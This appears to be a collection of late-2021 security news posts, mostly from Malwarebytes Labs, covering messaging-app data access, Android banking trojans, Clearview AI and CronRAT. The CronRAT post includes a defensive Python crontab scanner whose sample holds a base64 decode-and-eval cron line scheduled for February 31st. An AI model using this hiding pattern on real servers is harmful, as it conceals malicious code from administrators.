Steam cards usually only drop for paid titles. If you don’t buy the game, you can’t get cards. In this case, the base Capcom Arcade Stadium game is a free download with one free title included. This isn’t (and shouldn’t be!) enough to have cards start dropping.

However, something seems to have gone wrong. All of a sudden, people found they could obtain trading cards despite only having the free game. This meant a huge surge in botting activity to grab cards before someone at Valve—the company behind Steam—fixed it.

As a result, a massive number of card miners fired up their tools (whether ArchiSteamFarm or something else entirely) and idled their way to sweet card victory. As noted above, there are limits on how many cards you can farm. Once you hit the limit, that’s it – no more mining on that game ever. You have to trade or buy the rest. So this is, essentially, people wanting to get in on the ground floor of red hot card trading action.

Watching Steam achievement totals drop in real time

As this Ars Technica article notes, you can observe clues regarding the automated action taking place. One way to do this is by checking out Steam achievement numbers. Around 44.6% of people had gained the achievement for loading up a game for the first time a couple of days ago. Now, the number sits at just 7.9%. That’s lower than the previous figure in the article. The only way this number makes sense given the massive user numbers is if huge amounts of new game owners are using tools to “idle” while prospecting for card drops.

The leaky card pipeline has apparently been fixed, so no amount of idling will produce any more cards. This happens to games occasionally, most notably when an error caused card drops for Life is Strange 2. What usually happens after an incident like this is the market is flooded and card value plummets, so it’s probably a fraught time on the old trading card stock exchange or something.

When retro revivals are no more…

Unfortunately my dreams of a Strider revival off the back of massive player numbers and a sudden boom in retro gaming now seem unlikely. On the bright side, the peculiar rise in player numbers didn’t involve people up to no good with malware or phishing.

While Valve probably won’t be too pleased by the inadvertent rush on cards, that is at least one small mercy we can be thankful for.



Here’s what data the FBI can get from WhatsApp, iMessage, Signal, Telegram, and more

Wed, 12/01/2021 - 13:45

Not every secure messaging app is as safe as it would like us to think. And some are safer than others.

A recently disclosed FBI training document shows how much of the content of encrypted messages from secure messaging services US law enforcement can access, and what it can learn about your usage of the apps.

The infographic shows details about iMessage, Line, Signal, Telegram, Threema, Viber, WeChat, WhatsApp, and Wickr. All of them are messaging apps that promise end-to-end encryption for their users. And while the FBI document does not say this isn’t true, it reveals what type of information law enforcement will be able to unearth from each of the listed services.

Note: A pen register is an electronic tool that can be used to capture data regarding all telephone numbers that are dialed from a specific phone line. So if you see that mentioned below it refers to the FBI’s ability to find out who you have been communicating with.


iMessage is Apple’s instant messaging service. It works across Macs, iPhones, and iPads. Using it on Android is hard because Apple uses a special end-to-end encryption system in iMessage that secures the messages from the device they’re sent on, through Apple’s servers, to the device receiving them. Because the messages are encrypted, the iMessage network is only usable by devices that know how to decrypt the messages. Here’s what the document says law enforcement can access for iMessage:

  • Message content limited.
  • Subpoena: Can render basic subscriber information.
  • 18 USC §2703(d): Can render 25 days of iMessage lookups to and from a target number.
  • Pen Register: No capability.
  • Search Warrant: Can render backups of a target device; if target uses iCloud backup, the encryption keys should also be provided with content return. Can also acquire iMessages from iCloud returns if target has enabled Messages in iCloud.

Line is a freeware app for instant communications on electronic devices such as smartphones, tablets, and personal computers. In July 2016, Line Corporation turned on end-to-end encryption by default for all Line users, after it had earlier been available as an opt-in feature since October 2015. The document notes on Line:

  • Message content limited.
  • Suspect’s and/or victim’s registered information (profile image, display name, email address, phone number, LINE ID, date of registration, etc.)
  • Information on usage.
  • Maximum of seven days’ worth of specified users’ text chats (Only when end-to-end encryption has not been elected and applied and only when receiving an effective warrant; however, video, picture, files, location, phone call audio and other such data will not be disclosed).

Signal is a cross-platform centralized encrypted instant messaging service. Users can send one-to-one and group messages, which can include files, voice notes, images and videos. Signal uses standard cellular telephone numbers as identifiers and secures all communications to other Signal users with end-to-end encryption. The apps include mechanisms by which users can independently verify the identity of their contacts and the integrity of the data channel. The document notes about Signal:

  • No message content.
  • Date and time a user registered.
  • Last date of a user’s connectivity to the service.

This seems to be consistent with Signal’s claims.


Telegram is a freeware, cross-platform, cloud-based instant messaging (IM) system. The service also provides end-to-end encrypted video calling, VoIP, file sharing and several other features. There are also two official Telegram web twin apps—WebK and WebZ—and numerous unofficial clients that make use of Telegram’s protocol. The FBI document says about Telegram:

  • No message content.
  • No contact information provided for law enforcement to pursue a court order. As per Telegram’s privacy statement, for confirmed terrorist investigations, Telegram may disclose IP and phone number to relevant authorities.

Threema is an end-to-end encrypted mobile messaging app. Unlike other apps, it doesn’t require you to enter an email address or phone number to create an account. A user’s contacts and messages are stored locally, on each user’s device, instead of on the server. Likewise, your public keys reside on devices instead of the central servers. Threema uses the open-source library NaCl for encryption. The FBI document says it can access:

  • No message content.
  • Hash of phone number and email address, if provided by user.
  • Push Token, if push service is used.
  • Public Key
  • Date (no time) of Threema ID creation.
  • Date (no time) of last login.

Viber is a cross-platform messaging app that lets you send text messages, and make phone and video calls. Viber’s core features are secured with end-to-end encryption: calls, one-on-one messages, group messages, media sharing and secondary devices. This means that the encryption keys are stored only on the clients themselves and no one, not even Viber itself, has access to them. The FBI notes:

  • No message content.
  • Provides account (i.e. phone number) registration data and IP address at time of creation.
  • Message history: time, date, source number, and destination number.

WeChat is a Chinese multi-purpose instant messaging, social media and mobile payment app. User activity on WeChat has been known to be analyzed, tracked and shared with Chinese authorities upon request as part of the mass surveillance network in China. WeChat uses symmetric AES encryption but does not use end-to-end encryption to encrypt users’ messages. The FBI has less access than the Chinese authorities and can access:

  • No message content.
  • Accepts account preservation letters and subpoenas, but cannot provide records for accounts created in China.
  • For non-China accounts, they can provide basic information (name, phone number, email, IP address), which is retained for as long as the account is active.

WhatsApp is an American, freeware, cross-platform centralized instant messaging and VoIP service owned by Meta Platforms. It allows users to send text messages and voice messages, make voice and video calls, and share images, documents, user locations, and other content. WhatsApp’s end-to-end encryption is used when you message another person using WhatsApp Messenger. The FBI notes:

  • Message content limited.
  • Subpoena: Can render basic subscriber records.
  • Court order: Subpoena return as well as information like blocked users.
  • Search warrant: Provides address book contacts and WhatsApp users who have the target in their address book contacts.
  • Pen register: Sent every 15 minutes, provides source and destination for each message.
  • If target is using an iPhone and iCloud backups enabled, iCloud returns may contain WhatsApp data, to include message content.

Wickr has developed several secure messaging apps based on different customer needs: Wickr Me, Wickr Pro, Wickr RAM, and Wickr Enterprise. The Wickr instant messaging apps allow users to exchange end-to-end encrypted and content-expiring messages, including photos, videos, and file attachments. Wickr was founded in 2012 by a group of security experts and privacy advocates but was acquired by Amazon Web Services. The FBI notes:

  • No message content.
  • Date and time account created.
  • Type of device(s) app installed on.
  • Date of last use.
  • Number of messages.
  • Number of external IDs (email addresses and phone numbers) connected to the account, but not the plaintext external IDs themselves.
  • Avatar image.
  • Limited records of recent changes to account settings, such as adding or suspending a device (does not include message content or routing and delivery information).
  • Wickr version number.

If there is one thing clear from the information in this document it’s that most, if not all, of your messages are safe from prying eyes in these apps, unless you’re using WeChat in China. Based on the descriptions, you can check out which apps are available on your favorite platform and which of the bullet points are relevant to you, to decide which app is a good choice for you.

The safest way however is to make sure the FBI doesn’t consider you a person of interest. In those cases even using a special encrypted device can pose some risks.

Stay safe, everyone!

The post Here’s what data the FBI can get from WhatsApp, iMessage, Signal, Telegram, and more appeared first on Malwarebytes Labs.


Have you downloaded that Android malware from the Play Store lately?

Wed, 12/01/2021 - 11:58

Security researchers have discovered banking Trojan apps on the Google Play Store, and say they have been downloaded by more than 300,000 Android users.

As you may know, banking Trojans are kitted out for stealing banking data like your username and password, and the two-factor authentication (2FA) codes that you use to log in to your bank account. They are also capable of logging phone keystrokes and taking screenshots of what you’re seeing on your phone as you use it. All of this is done without the victim’s consent and without them noticing anything until it’s too late.

The particular malicious apps the ThreatFabric researchers found were disguised to look like apps that an Android user might normally search for, such as QR scanners, PDF scanners, cryptocurrency wallets, and fitness monitors. Knowing that a portion of Android users are aware that the Play Store often gets malware—and are therefore quite wary about what they download—these apps actually come with the functions they advertise, further alleviating any doubts in users’ minds about their legitimacy.

But, as users will soon realize, the duck test (if it looks and acts like one, it is one) only works for ducks: these apps begin to show their true intent after they have been installed.

So, how do these benign apps become fully malicious? The cybercriminals behind them introduce malicious code as updates to the apps—slowly and surely. It’s a common evasion tactic which gets their malicious app into the Play Store without raising alarms at the door. Note, however, that the Trojan code only reaches these apps when the attackers decide to push it, by manually updating them.

So, the human element is now introduced in an Android attack chain. Obviously, the attackers have adapted this method from the ransomware playbook.

If ransomware attackers can handpick their targets and rummage through files within their compromised networks, these Android attackers can handpick devices “infected” with their apps and manually start the download of the Trojan code in a specific region of the world. To illustrate, let’s say “Fitness App Alpha” is installed in one device in California, USA and one in Montreal, Canada. Bad Guy flicks the switch to have Trojan code downloaded into “Fitness App Alpha” in California. This means that “Fitness App Alpha” in California is now Trojanized, while the one in Montreal is not.

Code sample taken from the app, showing where attackers can target Android users who are customers of certain financial institutions they are after. This method is used by the actors behind the Anatsa campaign. (Source: ThreatFabric)

Attackers can not only pick their victims based on their region; they can also target Android users based on the device they use, a method used by those behind the Alien campaign. (Source: ThreatFabric)

According to ThreatFabric, filtering “makes automated detection a much harder strategy to adopt by any organization.”

Not only that, incrementally updating the app, location checking, and device checking are also methods that attackers use to ensure their app is running on actual Android devices and not on a security researcher’s testing environment.

“This incredible attention dedicated to evading unwanted attention renders automated malware detection less reliable,” the researchers further stated in their blog post. “Actors behind it took care of making their apps look legitimate and useful. There are large numbers of positive reviews for the apps. The number of installations and presence of reviews may convince Android users to install the app.”

In four months, four Android malware families have spread across the Google Play Store. They are Anatsa, Alien, Hydra, and Ermac. Their campaigns have fooled thousands of Android users, and we can only imagine how much they have already stolen from them until they were discovered and reported.

How to keep dodgy apps out of your phone

When looking for apps, make time to do your research. If you’re after, say, a QR code scanner, searching for “the top QR code scanners” or “the best QR code scanners” may be a good start, as there are dozens of articles on the internet about this very subject. If you trust the publisher of these articles, you can be reasonably assured that they have looked into these apps and tested them themselves before giving their recommendations.

Another way is to head straight to the Play Store and look for apps (a) with good reviews, (b) a large user base, and (c) that have been in the Play Store for quite some time now (at least 12 months). Be wary, of course, of reviews that could be fake. But if the app you want ticks most or all of the boxes I mentioned above, dig a little deeper and find out what its problems are and why some users don’t like it.

You could also consider installing security software on your phone. We’d be remiss here if we didn’t mention that Malwarebytes has an Android product.

Lastly, now is probably a good time to also audit your apps and get rid of those that you no longer use or update. You’re safer this way, too.


Most people aren’t upgrading to Windows 11: Not the end of the world

Wed, 12/01/2021 - 11:26

Windows 11 is experiencing an apparent lack of uptake among Windows users. If this survey is accurate, less than 1% of 10 million PCs surveyed are running the new operating system. In fact, more machines are using Windows XP.

That may surprise you. It might even seem like a bit of an embarrassing failure for Microsoft. However, the low numbers could well be a very good thing overall. It was always going to be a slow uptake, and we’re going to look at some of the reasons why.

Low numbers are to be expected – and that’s fine

There are quite a few barriers to entry for anyone looking to upgrade to Windows 11. In fact, it’s not just businesses facing Windows headaches. It’s home users too, but perhaps for somewhat different reasons.

  1. Old apps: A big reason ancient operating systems like XP still run in organisations is down to old, business critical apps. For most businesses, no one size fits all solution exists. Some of the tech will be outsourced. Bits of it will operate remotely, rather than in house. There’ll be bespoke applications made by someone who left the organisation 5 years ago. Most folks won’t know how it operates, just how to patch it if something goes wrong. Pulling it out will break lots of business critical systems, and there’s no guarantee a replacement will work. Oh, and by the way: it only runs on Windows XP. That’s how you end up with XP and other old operating systems all over the place. They’ve carved their tiny niche, and almost nothing will dislodge them.
  2. Strict requirements and confusing messaging: This boils down to TPM, or Trusted Platform Module. Microsoft made this a requirement to install the newer operating system. It’s an additional security feature which helps keep bad people away from your data. Unfortunately, initial descriptions of TPM were somewhat confusing. The continued state of malaise over TPM is likely keeping folks away from Windows 11 for the time being. Even now, it’s tricky to find people who make business decisions on tech who are familiar with the issue, and have the required equipment to run Windows 11 the way it’s supposed to be run.
  3. Gaming headaches: Many home users have avoided Windows 11 because of the potential impact on gaming performance. People don’t generally want to spend thousands on gaming rigs, then find their expensive graphics card is suddenly underperforming. If they’re running mid-range or cheap cards, they’re probably even more likely to say no. There’s definitely an air of “wait and see” where this is concerned. Nobody wants to mess up their pre-loaded Windows 10 box with a failed 11 upgrade. Folks who built their machines from scratch will probably want to stay with Windows 10 for the time being too. It’s just too much of a leap in the dark at the moment.

These are the main points, but we can think of some more.

Windows 10: ageing like a fine wine

Do people actually need to suddenly jump into Windows 11? What’s the compelling reason for doing so? It seems very likely that for most people, there just isn’t one. Yet.

I often use Windows 10. I’m fine with it, after a few false starts at the beginning. The handful of alterations to core functionality and usability that I’ve heard about, aren’t things I’m particularly interested in. They’re not deal-breakers, but I just wonder “Why bother? This works fine.”

Does Microsoft want people to adopt quickly?

I think we forget that Windows 10 has already been around for 6 years. It’s not a new thing anymore! Microsoft is entirely happy to keep Windows 10 chugging along. Support for it won’t end until October 14, 2025. That’s four more years of Windows 10 action, and it’ll still be used for some time after that. By that point, some of the more peculiar quirks will have been ironed out. Businesses will have a better feel for it.

If we’re lucky, the TPM hardware issues won’t be as big a concern. Some orgs may even have figured out how to update that in-house app from XP to 11 (they will not). And hey, you can always pay for patches on End of Life operating systems, should you really want to.

It seems, on balance, that it’s better to have the rollout happen slowly. Network admins have enough security concerns to worry about. Do they really need to hurl the shiny new Windows 11 into the network and juggle that responsibility too? The numbers seem to suggest not, and it’s possible Microsoft is also happy with this approach.

Whatever your decision, we wish you well in the upgrade struggles to come.


Massive faceprint scraping company Clearview AI hauled over the coals

Tue, 11/30/2021 - 16:43

Life must be hard for companies that try to make a living by invading people’s privacy. You almost feel sorry for them. Except I don’t.

The UK’s Information Commissioner’s Office (ICO)—an independent body set up to uphold information rights—has announced its provisional intent to impose a potential fine of just over £17 million (roughly US$23 million) on Clearview AI.

In addition, the ICO has issued a provisional notice to stop further processing of the personal data of people in the UK and delete what Clearview AI has, following alleged serious breaches of the UK’s data protection laws.

What is Clearview AI?

Clearview AI was founded in 2017, and started to make waves when it turned out to have created a groundbreaking facial recognition app. You could take a picture of a person, upload it and get to see public photos of that person, along with links to where those photos appeared.

According to its own website, Clearview AI provides a “revolutionary intelligence platform”, powered by facial recognition technology. The platform includes a facial network of 10+ billion facial images scraped from the public internet, including news media, mugshot websites, public social media, and other open sources.

Yes, scraped from social media, which means that if you’re on Facebook, Twitter, Instagram or similar, then your face may well be in the database.

Clearview AI says it uses its faceprint database to help law enforcement fight crimes. Unfortunately it’s not just law enforcement. Journalists uncovered that Clearview AI also licensed the app to at least a handful of private companies for security purposes.

Clearview AI ran a free trial with several law enforcement agencies in the UK, but these trials have since been terminated, so there seems to be little reason for Clearview to hold on to the data.

And worried citizens that wish to have their data removed, which companies have to do upon request under the GDPR, are often required to provide the company with even more data, including photographs, to be considered for removal.

It’s not just the UK that’s worried. Earlier this month, the Office of the Australian Information Commissioner (OAIC) ordered Clearview AI to stop collecting photos taken in Australia and remove the ones already in its collection.


The ICO says that the images in Clearview AI’s database are likely to include the data of a substantial number of people from the UK and these may have been gathered without people’s knowledge from publicly available information online.

The ICO found that Clearview AI has failed to comply with UK data protection laws in several ways, including:

  • Failing to process the information of people in the UK in a way they are likely to expect or that is fair
  • Failing to have a process in place to stop the data being retained indefinitely
  • Failing to have a lawful reason for collecting the information
  • Failing to meet the higher data protection standards required for biometric data (classed as ‘special category data’ under the GDPR and UK GDPR)
  • Failing to inform people in the UK about what is happening to their data
  • And, as mentioned earlier, asking for additional personal information, including photos, which may have acted as a disincentive to individuals who wish to object to their data being processed

Clearview AI Inc now has the opportunity to make representations in respect of these alleged breaches set out in the Commissioner’s Notice of Intent and Preliminary Enforcement Notice. These representations will then be considered and a final decision will be made.

As a result, the proposed fine and preliminary enforcement notice may be subject to change or there will be no further formal action.

There is some hope for Clearview AI if you look at past fines imposed by the ICO.

Marriott was initially expected to receive a fine of 110 million Euros after a data breach that happened in 2014 but wasn’t disclosed until 2018, but Marriott ended up having to pay “only” 20 million Euros. We can expect to hear a final decision against Clearview AI by mid-2022.

Facial recognition

A facial recognition system is a technology capable of matching a human face from a digital image or a video frame against a database of faces, typically employed to identify and/or authenticate users.

Facial recognition technology has always been controversial. It makes people nervous about Big Brother. It has a tendency to deliver false matches for certain groups, like people of color. Police departments have had access to facial recognition tools for almost 20 years, but they have historically been limited to searching government-provided images, such as mugshots and driver’s license photos.

Gathering images from the public internet obviously makes for a much larger dataset, but it’s not the intention with which the images were posted.

It’s because of the privacy implications that some tech giants have backed away from the technology, or halted their development. Clearview AI clearly is not one of them. Neither a tech giant nor a company that cares about privacy.


Hackers all over the world are targeting Tasmania’s emergency services

Mon, 11/29/2021 - 14:49

Emergency services—under which the police, fire, and emergency medical services departments fall—are infrastructure vital to any country or state. When those services come under threat from either physical or cyber entities, it’s as good as putting the lives of citizens at risk as well.

Unfortunately, not every place has the means and manpower of the US to put pressure on cybercriminals who dare to target its vital infrastructure. And this is probably why some threat actors would rather take their chances targeting other countries for profit.

As a case in point, the island state of Tasmania in Australia continues to be subjected to multiple cyberattacks on its emergency services from all around the globe.

Hackers have tried breaking into Tasmania Police employee accounts over 800 times in the last 12 months, according to an internal report from the Department of Police, Fire and Emergency Management (DPFEM) that was obtained by ABC News Australia.

And that’s just the tip of the iceberg. The report also revealed:

  • CCTV cameras have been compromised
  • A section of the Tasmania Fire Service website was taken over by one or more unknown parties for at least two weeks
  • Two-factor authentication (2FA) was defeated on five occasions on devices owned by DPFEM employees

The DPFEM is said to store and maintain personally identifiable data and classified information, which makes it a goldmine for hackers. If it was ever completely compromised, DPFEM said it won’t be able to bounce back as quickly as the Federal Group, Tasmania’s casino operator that fell victim to a ransomware attack from the DarkSide hacking group, did.

“Unlike Federal Group, DPFEM will not be able to recover its entire business operation in under six weeks, even with external assistance, because its Information Security Program is not mature enough to determine the full extent of a system compromise and, therefore, will be required to take all its systems back to bare metal to ensure environmental integrity,” the report said.

The report recommended that the Tasmania Police and Fire Service should invest $550,221 annually to “keep the department cyber safe.”


CronRAT targets Linux servers with e-commerce attacks

Mon, 11/29/2021 - 14:03

There’s an interesting find over at the Sansec blog, wrapping time and date manipulation up with a very smart RAT attack.

The file, named CronRAT, isn’t an e-commerce attack compromising payment terminals in physical stores. Rather, it looks to swipe payment details by going after vulnerable web stores and dropping payment skimmers on Linux servers. It’s your classic Magecart attack with a stealthy twist.

This method means it bypasses the protection people using the websites arm themselves with, rigging the game from the start. By the time you get onto the website, everything may be fine at your end but the stream further up river has already been polluted. It achieves this thanks to the Linux Cron Job system, which we’ll come back to a little later.

First of all, here’s a brief rundown on what Magecart is, and the difference between client-side and server-side attacks.

What is Magecart?

It’s the collective name used for multiple groups who partake in web skimming. These attacks rely on outdated CMSes, or plugin zero-days. They may go after small businesses running a particular e-commerce platform. It’s possible they use services like bulletproof hosting to frustrate researchers and law enforcement. Web shells are a popular tactic. There are even impersonators out there, just to make things even more confusing.

Client-side versus server-side attacks

Client-side is where the people who buy things from websites hang out. These are the places where operations such as Magecart may lurk. It could be bogus JavaScript loading in from untrusted domains, or perhaps some other form of rogue code. You can ward off threats such as these by using browser plugins like NoScript. There’s an element of control over these factors, in terms of how you try and secure your browser.

Server-side is an attack on the merchants. Your security processes and tools are great, but when someone is directly corrupting the site under the hood, you may be fighting a losing battle. While your typical web shopper’s first run-in with Magecart would be the previously mentioned rogue JavaScript or other code, this attack means browser-based fixes may not help.

With those out of the way, we’ll loop back to Cron and Cron Jobs.

What is Cron?

Cron is the way that people running a Linux system schedule tasks. Those tasks, known as Cron Jobs, run at a specified time/date in the future. Where things get interesting is that you can enter any date you like, even ones which don’t exist: cron validates each field on its own (a day of the month between 1 and 31, a month between 1 and 12) rather than checking whether the combination is a real calendar date. As long as the system accepts your input, it’ll take it on board and file it away in the scheduling system.

CronRAT adds various tasks to the cron table, with a date specification that’ll generate run time errors when triggered. What the malware authors have done is take advantage of the “any date can be used” functionality, and assigned them to February 31st. Of course, this is a date which doesn’t actually exist. As a result, the errors will never happen.

As Sansec puts it:

…the actual malware code is hidden in the task names and is constructed using several layers of compression and base64 decoding.

The payload is a “sophisticated bash program that features self-destruction, timing modulation and a custom binary protocol to communicate with a foreign control server.”
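To show what the date trick and the “payload in the task name” technique look like from the defender’s side, here is an added example (editor-written; not Sansec’s tooling and not CronRAT itself) that parses a crontab, flags entries whose day/month combination can never occur on a real calendar, and flags command fields that invoke base64 or carry a long base64-looking run. The sample crontab, its schedule values and the encoded blob are all constructed for the demo; the `31 2 *` line follows the February 31st pattern the article describes.

```python
"""Crontab triage: flag entries that can never fire (e.g. 31 February) and
entries whose command field looks like an encoded payload. Heuristic only."""
import base64
import calendar
import re

# Longest length of each month; 2020 is a leap year, so February yields 29.
MAX_DAYS = {m: calendar.monthrange(2020, m)[1] for m in range(1, 13)}
MONTH_NAMES = {calendar.month_abbr[m].lower(): m for m in range(1, 13)}
# A run of 40+ base64-alphabet characters is rare in a legitimate command line.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _atom(text, names):
    """One cron value: a number, or a month name such as 'feb'."""
    text = text.lower()
    return names[text] if text in names else int(text)


def expand_field(field, lo, hi, names=None):
    """Expand one cron field ("*", "1,15", "1-5", "*/10", "feb") into the set
    of integers it matches. Raises ValueError when a value is out of range."""
    names = names or {}
    values = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step_text = part.split("/", 1)
            step = int(step_text)
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            first, last = part.split("-", 1)
            start, end = _atom(first, names), _atom(last, names)
        else:
            start = _atom(part, names)
            end = hi if step > 1 else start  # "5/2" means 5,7,9,... up to hi
        if start < lo or end > hi or start > end:
            raise ValueError(f"{field!r} is outside {lo}-{hi}")
        values.update(range(start, end + 1, step))
    return values


def parse_entry(line):
    """Split a crontab line into (minute, hour, dom, month, dow, command).
    Returns None for blank lines, comments and VAR=value assignments."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
        return None
    parts = line.split(None, 5)
    return tuple(parts) if len(parts) == 6 else None


def can_ever_fire(dom_field, month_field, dow_field):
    """False when no day in dom_field exists in any month of month_field.
    Vixie cron runs a job when EITHER day-of-month or day-of-week matches once
    both are restricted (neither starts with '*'), so an impossible date only
    silences the job while day-of-week is left as '*'."""
    if not dow_field.startswith("*"):
        return True
    days = expand_field(dom_field, 1, 31)
    months = expand_field(month_field, 1, 12, MONTH_NAMES)
    return any(day <= MAX_DAYS[month] for month in months for day in days)


def looks_encoded(command):
    """Heuristic: the command invokes base64 or carries a long base64 run,
    both typical of a payload stored in the crontab rather than on disk."""
    return bool(re.search(r"\bbase64\b", command) or B64_RUN.search(command))


def scan_crontab(text):
    """Return [(line_number, [reason, ...]), ...] for suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_entry(line)
        if entry is None:
            continue
        _minute, _hour, dom, month, dow, command = entry
        reasons = []
        try:
            if not can_ever_fire(dom, month, dow):
                reasons.append("impossible date: entry never fires, a hiding place for data")
        except ValueError as exc:
            reasons.append(f"unparseable schedule: {exc}")
        if looks_encoded(command):
            reasons.append("command carries base64/encoded content")
        if reasons:
            findings.append((lineno, reasons))
    return findings


# Constructed sample crontab (not a real capture). The blob is a harmless echo
# command, base64-encoded here so the run is valid and long enough to match.
_DEMO_BLOB = base64.b64encode(b"echo constructed demo text, not malware").decode()
SAMPLE_CRONTAB = f"""\
# constructed sample, not a real capture
MAILTO=ops@example.com
0 2 * * * /usr/bin/certbot renew --quiet
*/15 * * * * /opt/shop/bin/reindex.sh
0 3 31 2 * /bin/sh -c 'eval "$(echo {_DEMO_BLOB} | base64 -d)"'
30 4 31 4,6,9,11 * /usr/local/bin/monthly-report
0 0 31 2 1 /bin/true
"""

if __name__ == "__main__":
    for lineno, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {lineno}: " + "; ".join(reasons))
```

Run against the sample, the scanner reports the February 31st line for both reasons and the “31st of 30-day months” line for the date alone, while the last line is left alone: its day-of-week field is restricted, so Vixie cron would still run it on Mondays in February, which is the caveat a reviewer should keep in mind before treating an odd date as harmless. Feed it the output of `crontab -l` for each account, plus the files under `/etc/cron.d`, and treat any hit as a prompt to look, not as a verdict.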

This is definitely one way for Magecart to make waves over the Black Friday period and also further still into the Christmas season.

The problem of digital skimming

Here are some thoughts from Jerome Segura, our Senior Director of Threat Intelligence:

We’ve known for a long time that there are two different ecosystems when it comes to website security: server-side and client-side. While most security companies focus on the latter, the former is probably the more interesting and perhaps less documented one as it requires access to backend systems. This is an example of a threat that is well crafted and meant to evade detection by default browser-side, but also in some aspects server-side due to its clever obfuscation techniques.

What that means from a digital skimming standpoint is that you are always accepting a level of risk by shopping online and placing trust in the merchant’s ability to keep their systems safe. You should be aware of any subtle changes in payment forms and other possible giveaways that a website is not up to par. Without getting too technical, certain things like outdated copyright information or broken HTML elements may be an indication that the store is not keeping their site up to date.

An attacker will first compromise online shops that are vulnerable to attacks, so it makes sense to stay clear of those that are not following best practices.

Safety first

There are lots of things you can do out there in the real world to avoid ATM skimmers and related threats. You can also be proactive in the realm of web-based skimmers targeting the sites you make payments on. Issues such as CronRAT may take a little while longer for various industries to figure out.

While there are varying levels of protection for web purchases, it may be dependent on payment method and/or location. It’s also not great to know that if payment data has been compromised, it’s possible the criminals have grabbed other data too. While this may not be the most reassuring message to take into the new year, forewarned is most definitely forearmed.


ICO challenges adtech to step up privacy protection

Fri, 11/26/2021 - 16:25

The UK Information Commissioner’s Office (ICO) wants the advertising industry to come up with new initiatives that address the risks of adtech, and take account of data protection requirements from the outset.

The ICO is an independent body set up to uphold information rights. The technology that is currently in use by the advertising industry has the potential to be highly privacy intrusive. And the ICO has the right to issue, on initiative or on request, opinions to Parliament, government, other institutions or bodies, and the public, on any issue related to the protection of personal data.

The problem

The concept is simple: Advertisers want to show adverts to individuals who are likely to buy their product, and consumers prefer to see adverts that are relevant to them over those that are not. To accomplish this, the advertising industry has come up with a complex web of data processing which includes profiling, tracking, auctioning, and sharing of personal data.

That approach leads to advertisers knowing far more about people than they need to, and having to store and secure all that data.

Moves in the right direction

In recent years, the ad industry has developed several initiatives for less intrusive technology to address these privacy risks. These include proposals from Google and other market participants to phase out the use of third-party cookies, and other forms of cross-site tracking, and replace them with alternatives.

Federated Learning of Cohorts (FLoC) is one of the initiatives by Google that aims to thread the needle of offering people targeted ads while respecting their privacy. That initiative got off to a bad start when it became known that Google had quietly added millions of Chrome users to a FLoC pilot without asking them.

Other recent developments highlighted by the ICO include:

  • Proposals like FLoC, that aim to phase out third-party cookies and replace them with alternatives.
  • Increases in the transparency of online tracking, such as Apple’s App Tracking Transparency, which has had a notable impact—both in terms of the number of users exercising control over tracking, as well as the market itself.
  • Mechanisms to enable individuals to indicate their privacy preferences in simple and effective ways.
  • Developments by browser developers to include tracking prevention in their software.

As an example of the last point, Enhanced Tracking Protection in Firefox automatically blocks trackers that collect information about your browsing habits and interests. But this is not as effective as you might hope. Blocking third-party cookies and related mechanisms does partially restrict cross-site trackers, but as long as a tracker is still being loaded in your browser, it can still track you. Not as easily as it did before, but tracking is still tracking, and the most prevalent cross-site trackers (looking at you, Google and Facebook) are certainly still tracking you.

Google’s status in the digital economy means that any proposal it puts forward has a significant impact. Not just because of the market share of its browser, but also due to the services it offers individuals and organizations, and the large role it plays in the digital advertising market.

In 2019, Google announced its vision for the Google Privacy Sandbox. The building blocks for this were essentially:

  • Most aspects of the web need money to survive, and advertising that relies on cookies is the dominant revenue stream.
  • Blocking ads or cookies can prevent advertisers from generating revenue, threatening the first point.
  • If you block easily controllable methods like cookies, advertisers may turn to other techniques, like fingerprinting, that are harder for users to control.

The ICO is attempting to insert itself into the rapidly evolving situation around adtech by means of a recently published opinion:

There is a window of opportunity for proposal developers to reflect on genuinely applying a data protection by design approach. The Commissioner therefore encourages Google and other participants to demonstrate how their proposals meet the expectations this opinion outlines.

The ICO is encouraging Google and other advertisers to demonstrate new proposals that can meet a set of expectations set out in the Opinion. It wants to see proposals to remove the use of technologies that lead to intrusive and unaccountable processing of personal data and device information, which increases the risks of harm to individuals.

The ICO says it expects any proposal to:

  • Engineer data protection requirements by default into the design of the initiative.
  • Offer users the choice of receiving adverts without tracking, profiling or targeting based on personal data.
  • Be transparent about how and why personal data is processed, and who is responsible for that processing.
  • Articulate the specific purposes for processing personal data, and demonstrate how this is fair, lawful and transparent.
  • Address existing privacy risks and mitigate any new privacy risks that their proposal introduces.

Like the ICO, we are looking forward to more privacy-focused ways of delivering targeted advertising.

The post ICO challenges adtech to step up privacy protection appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Google’s Threat Horizons report: Will the straightforward approach get results?

Thu, 11/25/2021 - 16:27

Google’s Cybersecurity Action Team has released a Threat Horizons report focusing on cloud security. It’s taken some criticism for being surprisingly straightforward and less complex than you may expect. On the other hand, many businesses simply don’t understand many of the threats at large. Perhaps this is a way of easing the people the report is aimed at into the wider discussion.

At any rate, the report is out and I think it’s worth digging into. They may be taking the “gently does it” approach because so many of their customers are falling foul of bad things. It makes sense to keep it simple in an effort to have people pay attention and nail the basics first. After all, if they can’t do that, then complex rundowns stand no chance.

Key features of the report

The executive summary lists a number of key points. There’s a strong focus on issues and concerns for people using Google services. For example:

“Of 50 recently compromised GCP instances, 86% of the compromised cloud instances were used to perform cryptocurrency mining, a cloud resource-intensive, for profit activity. Additionally, 10% of compromised cloud instances were used to conduct scans of other publicly available resources on the internet to identify vulnerable systems, and 8% of instances were used to attack other targets”.

In case you’re wondering, GCP means Google Cloud Platform.

Elsewhere, the summary mentions that Google cloud resources were used to generate bogus YouTube view counts. This sounds interesting, and it would be useful to know more about it. Unfortunately there are no details in the summary, and the full report doesn’t go into the nitty-gritty of what happened either. Given this one is a clear and easily understandable way to explain how [bad thing in cloud] equals [bad knock-on effect for a service everyone you know uses], it seems strange to keep us guessing.

Google also references the Fancy Bear/APT28 Gmail phishing attack, which we covered last month. While this isn’t exactly a common concern for most people, it is good to reiterate the usefulness of multiple Google security settings. 2FA, apps, backup codes, and advanced security settings are always better to have up and running than not at all.

It’s not just Google services up for discussion…

